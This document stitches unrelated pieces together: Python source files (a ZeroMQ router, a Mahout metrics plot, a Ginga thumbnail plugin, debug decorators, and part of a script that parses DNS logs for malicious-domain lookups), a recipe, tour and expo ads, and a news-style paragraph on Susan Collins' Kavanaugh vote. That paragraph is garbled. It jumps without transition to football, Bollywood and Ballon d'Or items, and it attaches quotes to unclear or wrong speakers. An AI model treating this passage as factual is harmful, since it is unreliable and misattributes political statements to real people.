        # constructor likely never returns and route() below is never
        # reached — confirm whether this was intentional.
        zmq.device(zmq.FORWARDER, self.publish_to_router,
                   self.subscribe_to_router)

    # noinspection PyMethodMayBeStatic
    def route(self):
        """
        This method runs in a forever loop, sleeping briefly each pass and
        exiting the process on Control-C.

        :return:
        """
        while True:
            try:
                time.sleep(.001)
            except KeyboardInterrupt:
                sys.exit(0)

    def clean_up(self):
        # Close both router sockets and terminate the zmq context.
        self.publish_to_router.close()
        self.subscribe_to_router.close()
        self.router.term()


def xideco_router():
    """Module entry point: build the router and run its loop."""
    # noinspection PyShadowingNames
    xideco_router = XidecoRouter()
    # route() loops forever (it only exits via sys.exit on KeyboardInterrupt),
    # so the statements below this call are effectively unreachable.
    xideco_router.route()

    # signal handler function called when Control-C occurs
    # noinspection PyShadowingNames,PyUnusedLocal,PyUnusedLocal
    def signal_handler(signal, frame):
        print('Control-C detected. See you soon.')
        xideco_router.clean_up()
        sys.exit(0)

    # listen for SIGINT
    signal.signal(signal.SIGINT, signal_handler)
    signal.signal(signal.SIGTERM, signal_handler)


# Instantiate the router and start the route loop
if __name__ == '__main__':
    xideco_router()
When Sen. Susan Collins announced, on Friday, October 5, that she would be voting "yes" on Brett M. Kavanaugh's confirmation to the U.S. Supreme Court, the four-term senator from Maine went out of her way to convince Kavanaugh's detractors that he wasn't the far-right extremist they thought he was. The Senate voted to confirm Kavanaugh to the nation's highest court with a 50-48 vote Saturday, and he was sworn in a few hours later. Susan Collins (R-Maine) on Monday claimed she's received a positive response to her decision to back the right-wing extremist. "Me", Rice responded. Psaki said any Collins opponent would be "well-funded". "I think the online crowd fundraising effort is the equivalent of trying to bribe me to take a particular position". But they do lead me to conclude that the allegations failed to meet the more-likely-than-not standard. Essentially they were proposing a quid pro quo. Here are five things that Collins got horribly wrong when she came out in support of Kavanaugh's confirmation. "It's certainly been a hard situation", Collins told the TV station. "Senator Collins will be well-funded [too], I can assure you", McConnell said. Hirono was not alone in her concerns about Collins' speech on the Senate floor on Friday and the decision to vote for Kavanaugh. Some critics have claimed Collins has refused to meet with sexual assault survivors. "As I watch numerous Senators speak and vote on the floor of the Senate I feel like I'm right back at Yale where half the room is laughing and looking the other way". President Donald Trump, on board Air Force One, gestures while watching a live television broadcast of the Senate confirmation vote of Supreme Court nominee Brett Kavanaugh, Oct. 6, 2018. 
Echoing Trump, Collins raised questions about the account of Christine Blasey Ford, who alleged that Kavanaugh drunkenly pinned her to a bed, groped her and put his hand over her mouth to stifle her screams as he tried to take off her clothes at a gathering at a house in the early 1980s. Pelley initiated the conversation with Collins and said: 'There are many who believe that judge Kavanuagh will be the vote that results in abortion becoming illegal in the United States. and I wonder if you are concerned about that?' "I can not conclude, based on the evidence and the complete lack of corroboration that Brett Kavanaugh was her assailant". Kavanaugh has denied all allegations. Collins said confidently that she is not concerned - and admitted she "could not vote for a judge who had demonstrated hostility to Roe v. Wade" - adding that it would 'indicate a lack of respect for precedent'. In Washington, President Donald Trump said today that he thought Collins was "incredible" and that she "gave an impassioned, lovely speech". I mean, that is so devastating. But, I will say that I thought his questioning, with the questioning with the senators, that he went over the line. So I think it was understandable that he was reacting as a human being, as a father, as a father of two young girls. But Smith's teammate, Henry Ruggs III, was there to pick it up at the 12 and took it in for the touchdown. After forcing a fumble on the Razorbacks first possession, Alabama got the ball back. All I have to say is, if something like this happens to any girl, in any industry, she must speak up and take a charge. Patekar has denied the allegations and had sent Dutta a legal notice to withdraw the claims and issue an apology. He already owns records for career completion percentage (67.1-percent), passing yards per game (342.3), and consecutive seasons of 4,500 yards (7). 
Obviously a win at Anfield would have been a huge psychological boost for his team, but a 0-0 draw is still a positive result. We tried to win but at the end we need to be happy - I need to be happy - that we didn't lose it because of the penalty. Wales forward Gareth Bale and England striker Harry Kane are among the nominees for the 2018 Ballon d'Or , BBC Sport reports. Kylian Mbappe is third-favourite after winning the World Cup with France at the age of 19, with 6-1 odds.
__author__ = 'cmantas'
from tools import *
from json import loads

# Raw metrics blob (a JSON string) for one Mahout k-means text-clustering run,
# selected by its fixed experiment parameters.
ms = take_single("select metrics from mahout_kmeans_text where k=15 and documents=90300 and dimensions=53235;")[0]
mj = loads(ms)

# Color cycle for the plotted series; next(cols) hands out one color per line.
cols = iter(["#727272", '#f1595f', '#79c36a', '#599ad3', '#f9a65a',
             '#9e66ab', '#cd7058', '#d77fb3'])


def timeline2vaslues(fieldname, metrics):
    # (name kept for backward compatibility — 'vaslues' is a historic typo)
    """Split a metrics timeline into parallel (times, values) lists.

    :param fieldname: key to extract from each sample dict
    :param metrics: iterable of (timestamp, sample_dict) pairs
    :return: (times, values) lists in input order
    """
    times = []
    values = []
    for timestamp, sample in metrics:
        times.append(timestamp)
        values.append(sample[fieldname])
    return times, values


def sum_timeline_vals(fieldnames, metrics):
    """Like timeline2vaslues, but sums several fields per sample.

    Fields whose name starts with "kbps" arrive as strings and are coerced
    to int in place before summing.

    :param fieldnames: keys whose per-sample values are added together
    :param metrics: iterable of (timestamp, sample_dict) pairs
    :return: (times, summed_values) lists in input order
    """
    times = []
    values = []
    for timestamp, sample in metrics:
        times.append(timestamp)
        total = 0  # renamed from 'sum' to avoid shadowing the builtin
        for field in fieldnames:
            if field.startswith("kbps"):
                sample[field] = int(sample[field])
            total += sample[field]
        values.append(total)
    return times, values


# figure()
fig, ax1 = plt.subplots()

# CPU and memory share the left axis (percentages).
times, values = timeline2vaslues("cpu", mj)
d, = ax1.plot(times, values, color=next(cols))
ax1.set_ylabel('percentage (%)')

times, values = timeline2vaslues("mem", mj)
a, = ax1.plot(times, values, color=next(cols))

# Disk and network throughput share the right axis (KB/s).
ax2 = ax1.twinx()
times, values = sum_timeline_vals(["kbps_read", "kbps_write"], mj)
ax2.set_ylabel("KB/s")
b, = ax2.plot(times, values, color=next(cols))

times, values = sum_timeline_vals(["net_in", "net_out"], mj)
c, = ax2.plot(times, values, color=next(cols))

plt.title("Mahout K-means Cluster Metrics")
plt.legend([d, a, b, c], ["CPU", "MEM", "Disk IO", "Net IO"], loc=3)
show()
Stir soymilk (or other milk), oats, syrup, chia, powdered peanut butter and salt together in a 2-cup mason jar. Refrigerate overnight. Serve topped with banana or berries. So easy to make and satisfyingly tasty in the morning!! Delicious and satisfying. I pop my jar in the micro for 1 minute and enjoy a warm healthy start to my morning. Sometimes I'll add a dollop of Greek yogurt and honey!
#
# Thumbs.py -- Thumbnail plugin for fits viewer
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from ginga.gtkw import FitsImageGtk as FitsImageGtk
from ginga import GingaPlugin

import os
import time
import hashlib
import gtk
import gobject

from ginga.misc import Bunch


class Thumbs(GingaPlugin.GlobalPlugin):
    """Global plugin that maintains a scrollable pane of image thumbnails.

    Thumbnails are keyed by (channel name, absolute path) tuples, stored in
    self.thumbDict (key -> widget bunch) and self.thumbList (ordered keys),
    and laid out in rows of self.thumbNumCols columns.
    """

    def __init__(self, fv):
        # superclass defines some variables for us, like logger
        super(Thumbs, self).__init__(fv)

        # For thumbnail pane
        self.thumbDict = {}        # thumbkey -> Bunch(widget, evbox)
        self.thumbList = []        # thumbkeys in display order
        self.thumbRowList = []     # one gtk.HBox per displayed row
        self.thumbNumRows = 20
        self.thumbNumCols = 1
        self.thumbColCount = 0     # column index where the next thumb goes
        # distance in pixels between thumbs
        self.thumbSep = 15
        # max length of thumb on the long side
        self.thumbWidth = 150

        prefs = self.fv.get_preferences()
        self.settings = prefs.createCategory('plugin_Thumbs')
        self.settings.load()

        # pending gobject timeout id used to debounce thumbnail regeneration
        self.thmbtask = None
        # debounce delay in milliseconds (see redo_delay)
        self.lagtime = 4000

        # FITS header keywords shown in the mouse-over tooltip
        self.keywords = ['OBJECT', 'FRAMEID', 'UT', 'DATE-OBS']

        fv.set_callback('add-image', self.add_image)
        fv.set_callback('add-channel', self.add_channel)
        fv.set_callback('delete-channel', self.delete_channel)
        fv.add_callback('active-image', self.focus_cb)

    def build_gui(self, container):
        """Construct the thumbnail pane widgets inside *container*."""
        width, height = 300, 300
        cm, im = self.fv.cm, self.fv.im

        # off-screen viewer used to render each thumbnail image
        tg = FitsImageGtk.FitsImageGtk(logger=self.logger)
        tg.configure(200, 200)
        tg.enable_autozoom('on')
        tg.enable_autocuts('on')
        tg.enable_auto_orient(True)
        tg.set_makebg(False)
        self.thumb_generator = tg

        sw = gtk.ScrolledWindow()
        sw.set_border_width(2)
        sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC)

        # Create thumbnails pane
        vbox = gtk.VBox(spacing=14)
        vbox.set_border_width(4)
        self.w.thumbs = vbox
        sw.add_with_viewport(vbox)
        sw.show_all()
        self.w.thumbs_scroll = sw
        # re-flow columns whenever the pane is resized
        self.w.thumbs_scroll.connect("size_allocate", self.thumbpane_resized)
        #nb.connect("size_allocate", self.thumbpane_resized)

        # TODO: should this even have it's own scrolled window?
        container.pack_start(sw, fill=True, expand=True)

    def add_image(self, viewer, chname, image):
        """Callback for 'add-image': create and insert a thumb for *image*."""
        noname = 'Noname' + str(time.time())
        name = image.get('name', noname)
        path = image.get('path', None)
        if path != None:
            path = os.path.abspath(path)
        # display label is the file name without its extension
        thumbname = name
        if '.' in thumbname:
            thumbname = thumbname.split('.')[0]
        self.logger.debug("making thumb for %s" % (thumbname))

        # Is there a preference set to avoid making thumbnails?
        chinfo = self.fv.get_channelInfo(chname)
        prefs = chinfo.prefs
        if not prefs.get('genthumb', False):
            return

        # Is this thumbnail already in the list?
        # NOTE: does not handle two separate images with the same name
        # in the same channel
        thumbkey = (chname.lower(), path)
        if self.thumbDict.has_key(thumbkey):
            return

        #data = image.get_data()
        # Get metadata for mouse-over tooltip
        header = image.get_header()
        metadata = {}
        for kwd in self.keywords:
            metadata[kwd] = header.get(kwd, 'N/A')

        #self.thumb_generator.set_data(data)
        self.thumb_generator.set_image(image)
        # mirror the channel viewer's cuts/transforms/colormap onto the thumb
        self.copy_attrs(chinfo.fitsimage)
        imgwin = self.thumb_generator.get_image_as_widget()

        imgwin.set_property("has-tooltip", True)
        imgwin.connect("query-tooltip", self._mktt(thumbkey, name, metadata))

        self.insert_thumbnail(imgwin, thumbkey, thumbname, chname, name, path)

    def _mktt(self, thumbkey, name, metadata):
        # Build a query-tooltip handler closure bound to this thumb's metadata.
        return lambda tw, x, y, kbmode, ttw: self.query_thumb(thumbkey, name, metadata, x, y, ttw)

    def insert_thumbnail(self, imgwin, thumbkey, thumbname, chname, name, path):
        """Wrap *imgwin* in a labeled, clickable widget and append it to the pane."""
        vbox = gtk.VBox(spacing=0)
        vbox.pack_start(gtk.Label(thumbname), expand=False,
                        fill=False, padding=0)
        evbox = gtk.EventBox()
        evbox.add(imgwin)
        # clicking a thumb switches the viewer to that channel/image
        evbox.connect("button-press-event",
                      lambda w, e: self.fv.switch_name(chname, name,
                                                       path=path))
        vbox.pack_start(evbox, expand=False, fill=False)
        vbox.show_all()

        bnch = Bunch.Bunch(widget=vbox, evbox=evbox)

        # start a new row when the previous one is full
        if self.thumbColCount == 0:
            hbox = gtk.HBox(homogeneous=True, spacing=self.thumbSep)
            self.w.thumbs.pack_start(hbox)
            self.thumbRowList.append(hbox)
        else:
            hbox = self.thumbRowList[-1]
        hbox.pack_start(bnch.widget)
        self.thumbColCount = (self.thumbColCount + 1) % self.thumbNumCols

        self.w.thumbs.show_all()

        self.thumbDict[thumbkey] = bnch
        self.thumbList.append(thumbkey)

        # force scroll to bottom of thumbs
        # adj_w = self.w.thumbs_scroll.get_vadjustment()
        # max = adj_w.get_upper()
        # adj_w.set_value(max)
        self.logger.debug("added thumb for %s" % (thumbname))

    def reorder_thumbs(self):
        """Rebuild all rows from self.thumbList (e.g. after a column-count change)."""
        # Remove old rows
        for hbox in self.thumbRowList:
            children = hbox.get_children()
            for child in children:
                hbox.remove(child)
            self.w.thumbs.remove(hbox)

        # Add thumbs back in by rows
        self.thumbRowList = []
        colCount = 0
        hbox = None
        for thumbkey in self.thumbList:
            self.logger.debug("adding thumb for %s" % (str(thumbkey)))
            # NOTE(review): thumbkeys are built as (chname, path) elsewhere;
            # the second element unpacked here as 'name' is actually the path
            # (it is unused below, so this is harmless) — confirm.
            chname, name = thumbkey
            bnch = self.thumbDict[thumbkey]
            if colCount == 0:
                hbox = gtk.HBox(homogeneous=True, spacing=self.thumbSep)
                hbox.show()
                self.w.thumbs.pack_start(hbox)
                self.thumbRowList.append(hbox)
            hbox.pack_start(bnch.widget)
            hbox.show_all()
            colCount = (colCount + 1) % self.thumbNumCols

        self.thumbColCount = colCount
        self.w.thumbs.show_all()

    def update_thumbs(self, nameList):
        """Drop thumbs whose keys are no longer present in *nameList*."""
        # Remove old thumbs that are not in the dataset
        invalid = set(self.thumbList) - set(nameList)
        if len(invalid) > 0:
            for thumbkey in invalid:
                self.thumbList.remove(thumbkey)
                del self.thumbDict[thumbkey]

            self.reorder_thumbs()

    def thumbpane_resized(self, widget, allocation):
        """size_allocate handler: recompute the column count and re-flow."""
        x, y, width, height = self.w.thumbs_scroll.get_allocation()
        self.logger.debug("reordering thumbs width=%d" % (width))

        cols = max(1, width // (self.thumbWidth + self.thumbSep))
        if self.thumbNumCols == cols:
            # If we have not actually changed the possible number of columns
            # then don't do anything
            return False
        self.logger.debug("column count is now %d" % (cols))
        self.thumbNumCols = cols

        self.reorder_thumbs()
        return False

    def query_thumb(self, thumbkey, name, metadata, x, y, ttw):
        """query-tooltip handler: fill *ttw* with this thumb's metadata text."""
        objtext = 'Object: UNKNOWN'
        try:
            objtext = 'Object: ' + metadata['OBJECT']
        except Exception, e:
            self.logger.error("Couldn't determine OBJECT name: %s" % str(e))

        uttext = 'UT: UNKNOWN'
        try:
            uttext = 'UT: ' + metadata['UT']
        except Exception, e:
            self.logger.error("Couldn't determine UT: %s" % str(e))

        chname, path = thumbkey

        s = "%s\n%s\n%s\n%s" % (chname, name, objtext, uttext)
        ttw.set_text(s)

        return True

    def clear(self):
        """Remove all thumbnails from the pane."""
        self.thumbList = []
        self.thumbDict = {}
        self.reorder_thumbs()

    def add_channel(self, viewer, chinfo):
        """Called when a channel is added from the main interface.
        Parameter is chinfo (a bunch).

        Hooks viewer events so thumbs are regenerated when the channel's
        cuts, transforms, or color map change."""
        fitsimage = chinfo.fitsimage
        fitsimage.add_callback('cut-set', self.cutset_cb)
        fitsimage.add_callback('transform', self.transform_cb)

        rgbmap = fitsimage.get_rgbmap()
        rgbmap.add_callback('changed', self.rgbmap_cb, fitsimage)

    def focus_cb(self, viewer, fitsimage):
        # Reflect transforms, colormap, etc.
        #self.copy_attrs(fitsimage)
        self.redo_delay(fitsimage)

    def transform_cb(self, fitsimage):
        self.redo_delay(fitsimage)
        return True

    def cutset_cb(self, fitsimage, loval, hival):
        self.redo_delay(fitsimage)
        return True

    def rgbmap_cb(self, rgbmap, fitsimage):
        # color mapping has changed in some way
        self.redo_delay(fitsimage)
        return True

    def copy_attrs(self, fitsimage):
        # Reflect transforms, colormap, etc. of *fitsimage* onto the
        # thumbnail generator without triggering a redraw.
        fitsimage.copy_attributes(self.thumb_generator,
                                  ['transforms', 'cutlevels',
                                   'rgbmap'],
                                  redraw=False)

    def redo_delay(self, fitsimage):
        # Delay regeneration of thumbnail until most changes have propagated
        # (cancel any pending timeout and restart the lagtime countdown)
        if self.thmbtask != None:
            gobject.source_remove(self.thmbtask)
        self.thmbtask = gobject.timeout_add(self.lagtime,
                                            self.redo_thumbnail, fitsimage)
        return True

    def redo_thumbnail(self, fitsimage, save_thumb=None):
        """Regenerate the thumbnail for the image currently in *fitsimage*."""
        self.logger.debug("redoing thumbnail...")
        # Get the thumbnail image
        image = fitsimage.get_image()
        if image == None:
            return
        if save_thumb == None:
            save_thumb = self.settings.get('cacheThumbs', False)

        chname = self.fv.get_channelName(fitsimage)

        # Get metadata for mouse-over tooltip
        header = image.get_header()
        metadata = {}
        for kwd in self.keywords:
            metadata[kwd] = header.get(kwd, 'N/A')

        # Look up our version of the thumb
        name = image.get('name', None)
        path = image.get('path', None)
        if path == None:
            return
        path = os.path.abspath(path)
        try:
            # NOTE(review): add_image/make_thumbs lowercase the channel name
            # in the key, but chname here is not lowercased — a mismatch
            # would make this lookup miss; confirm get_channelName's casing.
            thumbkey = (chname, path)
            bnch = self.thumbDict[thumbkey]
        except KeyError:
            return

        # Generate new thumbnail
        # TODO: Can't use set_image() because we will override the saved
        # cuts settings...should look into fixing this...
        ## timage = self.thumb_generator.get_image()
        ## if timage != image:
        ##     self.thumb_generator.set_image(image)
        #data = image.get_data()
        #self.thumb_generator.set_data(data)
        self.thumb_generator.set_image(image)
        fitsimage.copy_attributes(self.thumb_generator,
                                  ['transforms', 'cutlevels',
                                   'rgbmap'],
                                  redraw=False)

        # Save a thumbnail for future browsing
        if save_thumb:
            thumbpath = self.get_thumbpath(path)
            if thumbpath != None:
                self.thumb_generator.save_image_as_file(thumbpath,
                                                        format='jpeg')

        imgwin = self.thumb_generator.get_image_as_widget()

        imgwin.set_property("has-tooltip", True)
        imgwin.connect("query-tooltip", self._mktt(thumbkey, name, metadata))

        # Replace thumbnail image widget
        child = bnch.evbox.get_child()
        bnch.evbox.remove(child)
        bnch.evbox.add(imgwin)

    def delete_channel(self, viewer, chinfo):
        """Called when a channel is deleted from the main interface.
        Parameter is chinfo (a bunch)."""
        chname_del = chinfo.name.lower()
        # TODO: delete thumbs for this channel!
        self.logger.info("deleting thumbs for channel '%s'" % (
            chname_del))
        newThumbList = []
        for thumbkey in self.thumbList:
            chname, path = thumbkey
            if chname != chname_del:
                newThumbList.append(thumbkey)
            else:
                del self.thumbDict[thumbkey]
        self.thumbList = newThumbList
        self.reorder_thumbs()

    def _make_thumb(self, chname, image, path, thumbkey,
                    save_thumb=False, thumbpath=None):
        # This is called by the make_thumbs() as a gui thread
        self.thumb_generator.set_image(image)
        # Save a thumbnail for future browsing
        if save_thumb and (thumbpath != None):
            self.thumb_generator.save_image_as_file(thumbpath,
                                                    format='jpeg')

        imgwin = self.thumb_generator.get_image_as_widget()

        # Get metadata for mouse-over tooltip
        image = self.thumb_generator.get_image()
        header = image.get_header()
        metadata = {}
        for kwd in self.keywords:
            metadata[kwd] = header.get(kwd, 'N/A')

        dirname, name = os.path.split(path)

        imgwin.set_property("has-tooltip", True)
        imgwin.connect("query-tooltip", self._mktt(thumbkey, name, metadata))

        thumbname = name
        if '.' in thumbname:
            thumbname = thumbname.split('.')[0]

        self.insert_thumbnail(imgwin, thumbkey, thumbname, chname,
                              name, path)
        self.fv.update_pending(timeout=0.001)

    def make_thumbs(self, chname, filelist):
        """Generate thumbs for *filelist*, loading cached JPEGs when available."""
        # This is called by the FBrowser plugin, as a non-gui thread!
        lcname = chname.lower()
        cacheThumbs = self.settings.get('cacheThumbs', False)

        for path in filelist:
            self.logger.info("generating thumb for %s..." % (
                path))

            # Do we already have this thumb loaded?
            path = os.path.abspath(path)
            thumbkey = (lcname, path)
            if self.thumbDict.has_key(thumbkey):
                continue

            # Is there a cached thumbnail image on disk we can use?
            save_thumb = cacheThumbs
            image = None
            thumbpath = self.get_thumbpath(path)
            if (thumbpath != None) and os.path.exists(thumbpath):
                save_thumb = False
                try:
                    image = self.fv.load_image(thumbpath)
                except Exception, e:
                    # cached thumb unreadable: fall through and load the original
                    pass

            try:
                if image == None:
                    image = self.fv.load_image(path)
                # hand widget creation back to the gui thread
                self.fv.gui_do(self._make_thumb, chname, image, path,
                               thumbkey, save_thumb=save_thumb,
                               thumbpath=thumbpath)

            except Exception, e:
                self.logger.error("Error generating thumbnail for '%s': %s" % (
                    path, str(e)))
                continue
                # TODO: generate "broken thumb"?

    def _gethex(self, s):
        # SHA-1 hex digest used to build stable cache file/dir names
        return hashlib.sha1(s).hexdigest()

    def get_thumbpath(self, path, makedir=True):
        """Return the cache file path for *path*'s thumbnail, or None.

        With makedir=True the cache directory is created on demand (with a
        'meta' file recording the source directory)."""
        path = os.path.abspath(path)
        dirpath, filename = os.path.split(path)
        # Get thumb directory
        cacheLocation = self.settings.get('cacheLocation', 'local')
        if cacheLocation == 'ginga':
            # thumbs in .ginga cache
            prefs = self.fv.get_preferences()
            thumbDir = os.path.join(prefs.get_baseFolder(), 'thumbs')
            thumbdir = os.path.join(thumbDir, self._gethex(dirpath))
        else:
            # thumbs in .thumbs subdirectory of image folder
            thumbdir = os.path.join(dirpath, '.thumbs')

        if not os.path.exists(thumbdir):
            if not makedir:
                self.logger.error("Thumb directory does not exist: %s" % (
                    thumbdir))
                return None

            try:
                os.mkdir(thumbdir)
                # Write meta file
                metafile = os.path.join(thumbdir, "meta")
                with open(metafile, 'w') as out_f:
                    out_f.write("srcdir: %s\n" % (dirpath))

            except OSError, e:
                self.logger.error("Could not make thumb directory '%s': %s" % (
                    thumbdir, str(e)))
                return None

        # Get location of thumb
        # filename + mtime make the cache key, so an updated source image
        # gets a fresh thumbnail instead of a stale cached one
        modtime = os.stat(path).st_mtime
        thumbkey = self._gethex("%s.%s" % (filename, modtime))
        thumbpath = os.path.join(thumbdir, thumbkey + ".jpg")
        self.logger.debug("thumb path is '%s'" % (thumbpath))
        return thumbpath

    def __str__(self):
        return 'thumbs'

#END
All courses include lunch on school days, welcome drink, course books, graduation dinner, staff to assist you at all times, LIABP wristbands for discounts on Ios and trial shifts at partner bars (if wanting to stay on for the summer). We Love Receiving Feedback From The Legends Who Book With Us! Definitely going to travel with LIABP again! I never thought I would make so many friends on a holiday trip, but travelling with LIABP made it possible. We had the opportunity to do whatever we wanted to do, but the LIABP team always had a plan if we wanted to do something with the whole group. I can honestly say that the nights were so much funnier when we were a big group! I am definitely going to travel with LIABP next year, I can't wait to party with even more people! Travelling with LIABP to Ios was amazing, and I don't regret it for a second. I made so many new friends and got to experience things I wouldn't have if I was travelling alone. Definitely the time of my life! Met so many great people! I'll never forget my first trip with LIABP this summer. I met so many great people through LIABP, who made the whole experience perfect. I would never regret going on that Tour and there is no doubt that I will travel with LIABP in the next years! Hope to see you guys there. Travelling with LIABP was one of the most fun and wildest things that I've experienced. The atmosphere was great and it was almost like we all were part of a big family by the end of the trip. I'll join again next summer for sure! Totally recommended for everyone. Met the LIABP crew when I was in Ios in 2013.. Like a mini army conquering the bars and clubs of Ios together! You NEED to experience a LIABP holiday.. There are no words! Everyday was a new party! I joined LIABP for their Ios Tour this year and had the best time of my life. Everyday was a new party with heaps of cool new friends. 
I would have never experienced the things I did if I didn't Tour with LIABP, the amazing crew and everybody else on the Tour. We destroyed the island and I can't wait to do it all again next year! Ios is just amazing! Last summer with LIABP was one of the best times in my life! I met so many crazy people and made so much unforgettable memories. In normal life I'm very busy and I have to study a lot but a summer with LIABP helps me to get away from all this and enjoy happiness. PayPal is a quick and secure means of accepting online payments from customers with or without PayPal accounts. Accepts all major credit/debit cards (Visa & MasterCard), eCheques, Bank Transfers and PayPal accounts. You do not need a PayPal account to pay for your holiday with Life is a Beachparty. You can pay with a credit/debit card (Visa, MasterCard) via PayPal. A deposit payment must be paid at time of booking to confirm your booking! The remaining payment is not due until your holiday & should be paid during your stay in Barschool to your chosen hotel owner/manager (cash or credit/debit card options are available). For cancellation policy please read full terms & conditions. If you require further assistance please email us at ios@lifeisabeachparty.com. Payment process will be initiated after completing this booking. Allow 24 hours for funds to arrive and receive official confirmation documents. Our customer services team will help you with all of your holiday needs.
#
# Copyright (C) 2009 Michael Budde <mbudde@gmail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

"""Lightweight tracing helpers gated by the module-level DEBUGGING flag."""

import os
import inspect
from functools import wraps


# Is debugging enabled?  (was a bare string statement; a comment is correct)
DEBUGGING = False


def debug(msg):
    """Print *msg* prefixed with the caller's file, line and function.

    No-op when DEBUGGING is false.  The parameter was renamed from ``str``
    (which shadowed the builtin); positional callers are unaffected.
    """
    if not DEBUGGING:
        return
    # stack()[1] is the frame of our caller: (frame, filename, lineno, function, ...)
    s = inspect.stack()[1]
    # print() works on both Python 2 (single arg) and 3; the original mixed
    # a Py2 print statement here with print() calls below.
    print('{file}:{line}:{func}: {msg}'.format(
        file=os.path.basename(s[1]), line=s[2], func=s[3], msg=msg))


def debugfun(fun):
    """Decorator: log each call of *fun* with its args and result.

    Returns *fun* untouched when DEBUGGING is false, so there is zero
    overhead in production.
    """
    if not DEBUGGING:
        return fun

    @wraps(fun)
    def wrapper(*args, **kwargs):
        res = fun(*args, **kwargs)
        print('{0} ( {1} {2} ) -> {3}'.format(fun.__name__, args, kwargs, res))
        return res
    return wrapper


def debugmethod(fun):
    """Decorator for methods: log entry (args) and exit (result) of *fun*.

    Unlike debugfun, this always wraps, regardless of DEBUGGING (preserving
    the original behavior).
    """
    @wraps(fun)
    def wrapper(klass, *args, **kwargs):
        info = {
            # module name of the immediate caller (file name minus '.py')
            'file': os.path.basename(inspect.stack()[1][1])[:-3],
            'cls': klass.__class__.__name__,
            'fun': fun.__name__,
            'args': args,
            'kwargs': kwargs
        }
        print('{file}.{cls}.{fun} <-- {args} {kwargs}'.format(**info))
        info.update({'res': fun(klass, *args, **kwargs)})
        print('{file}.{cls}.{fun} --> {res}'.format(**info))
        return info['res']
    return wrapper
ADMISSION & PARKING* IS FREE! Join us for the inaugural Movement Health & Wellness Expo featuring tons of great activities for everyone including the kiddos! Workshops, classes, demos, vendors, DJs and more! With over 100 exhibitors, kid’s fun run & obstacle course, sunrise yoga, fitness competitions, food demos and classes — there is something for everyone. This event is a charity event benefitting The Movember Foundation. Together we can make a difference for men’s health – in prostate cancer, testicular cancer, mental health, and suicide prevention. Get the day started with “Yoga in the Park” and enjoy classes and demos all day. Tons for the kiddos to do — from obstacle courses to rock walls and a bounce house. Beginner or elite athletes are all welcome! Click here to register. Guest speakers and workshops from our vendors and sponsors. Healthy food trucks will be on site with plenty of cuisines to satisfy everyone! Over 80 local and national brands will be on display. Click the button below to fill out the application!
import gzip
from datetime import datetime
import struct, socket
import logging
import os,sys
import MySQLdb
import glob
import yaml
from sys import exc_info

# Application root: two directories above this script.
appPath = os.path.abspath(os.path.dirname(os.path.realpath(__file__)) + "/../../")
sys.path.append(appPath + "/lib/pylib")
from pull_config import Configurator

# Credentials used for the database connection
# (a duplicate `configr = Configurator()` was removed)
configr = Configurator()
DB = configr.get_var('db')
HOST = configr.get_var('db_host')
USERNAME = configr.get_var('db_user')
PASSWORD = configr.get_var('db_pass')

# logging set up: everything to message_log, ERROR and above also to error_log
logger = logging.getLogger('named_malware.py')
hdlr = logging.FileHandler(appPath + '/logs/message_log')
error_hdlr = logging.FileHandler(appPath + '/logs/error_log')
formatter = logging.Formatter('%(asctime)s %(levelname)s %(name)s: %(message)s')
hdlr.setFormatter(formatter)
error_hdlr.setFormatter(formatter)
error_hdlr.setLevel(logging.ERROR)
logger.addHandler(hdlr)
logger.addHandler(error_hdlr)
logger.setLevel(logging.DEBUG)
logger.debug('args: [\''+('\', \''.join(sys.argv))+'\']')

# config vars
named_dir = configr.get_var('approot')+"app/scripts/named/"

# parse args and read import config
if len(sys.argv) < 2:
    logger.error('Config file path required')
    sys.exit(1)
try:
    # safe_load: the config is plain data; yaml.load would allow
    # arbitrary python object construction
    import_config = yaml.safe_load(open(sys.argv[1], 'r').read())
except Exception:
    logger.error('Error loading config file: {0}'.format(sys.argv[1]), exc_info=True)
    # Bail out: previously execution continued and crashed later with a
    # NameError because import_config was never bound.
    sys.exit(1)

whitelisted_ips = set(import_config['whitelisted_ips'])
src = import_config['named_src']
src_id = -1  # pre database lookup value
chunksize = import_config['chunksize']
archive = import_config['archive']
current_year = datetime.today().year
current_month = datetime.today().month
domains = {}      # malicious domain name (lower case) -> domain_id
ips = {}          # dotted-quad ip -> numeric value cache
uniq_set = set()  # formatted records already seen for the current file
count = 0
conn = None       # database connection, created lazily by connect_db()
cursor = None


def connect_db():
    """Open the database connection and cursor (stored in globals)."""
    global conn, cursor
    logger.info("Opening database connection")
    conn = MySQLdb.connect(host=HOST, user=USERNAME, passwd=PASSWORD, db=DB)
    cursor = conn.cursor()


# Used to add the correct year to the date because the logs do not contain the year
def convert_date(d):
    dt = datetime.strptime(d, "%b %d %H:%M:%S")
    # December entries processed in a later month belong to the previous year
    if current_month < 12 and dt.month == 12:
        dt = dt.replace(year=current_year-1)
    else:
        dt = dt.replace(year=current_year)
    return dt.strftime("%Y-%m-%d %H:%M:%S")


# Check if the line is a dns resolution
def is_dns_resolution(l):
    return len(l) > 8 and l[5] == 'client' and l[8] == 'query:'


# Checks if the record is unique.
# Also adds the record to the unique set if it is unique.
def is_unique(record):
    global uniq_set
    if record in uniq_set:
        return False
    uniq_set.add(record)
    return True


# Extracts the date from the line.
# Calls convert_date and returns the result.
def get_date(l):
    date = ' '.join(l[:3])
    return convert_date(date)


# Get ip and ip numeric from the ip portion of the log line
def get_ip(ip):
    # strip off extra data (bind appends '#port' to the client address)
    ip = ip.split('#')[0]
    # Check if the numeric value was computed previously
    if ip in ips:
        ip_numeric = ips[ip]
    else:
        # Compute numeric value and store for quick lookup
        try:
            ip_numeric = struct.unpack('>L', socket.inet_aton(ip))[0]
        except (struct.error, socket.error):
            # fixed: this logged the undefined name 'l', raising a
            # NameError instead of the intended message
            logger.error('error with ip numeric for ip: {0}'.format(ip))
            raise
        ips[ip] = ip_numeric
